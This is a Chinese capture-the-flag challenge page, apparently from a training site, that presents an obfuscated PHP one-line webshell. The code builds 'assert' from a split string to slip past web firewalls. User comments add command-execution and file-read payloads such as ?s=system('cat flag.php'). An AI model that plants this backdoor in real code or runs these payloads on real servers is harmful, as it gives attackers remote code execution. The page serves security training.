shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8347
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
lawrencekz 9天前
举报

flag{******}

回复 0
hwx 12天前
举报

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 0
b2026tf 28天前
举报

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0
syhaisy 1月前
举报

20702af5309ab1f70e0f7e8a81076a4e

回复 0
hualong 1月前
举报

直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);

回复 1
dlccom 1月前
举报

?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag

回复 0
谢特恒123 1月前
举报

这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法

回复 1
kitniu 2月前
举报

?s=system(dir),然后进入txt文件,flag{********}

回复 1
攻防小哥 2月前
举报

flag{********}

回复 0
smartada 3月前
举报

flag{****}

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(10)

解题动态

warm007 攻破了该题 1小时前
R1 攻破了该题 5小时前
a591961189 攻破了该题 7小时前
阿杰学网安 攻破了该题 7小时前
yxm8085 攻破了该题 9小时前
xtelnet 攻破了该题 13小时前
dcd 攻破了该题 14小时前
bbbuild 攻破了该题 1天前
yy147369 攻破了该题 1天前
yiyiyiyi1 攻破了该题 1天前
搁浅的小鱼 攻破了该题 1天前
aaggyy1 攻破了该题 1天前
18737958336 攻破了该题 1天前
yehlg 攻破了该题 1天前
zzasas 攻破了该题 1天前
mybugku26 攻破了该题 1天前
sfwy 攻破了该题 1天前
天青色等烟雨 攻破了该题 1天前
沐恩 攻破了该题 1天前
a637814143 攻破了该题 2天前
问题反馈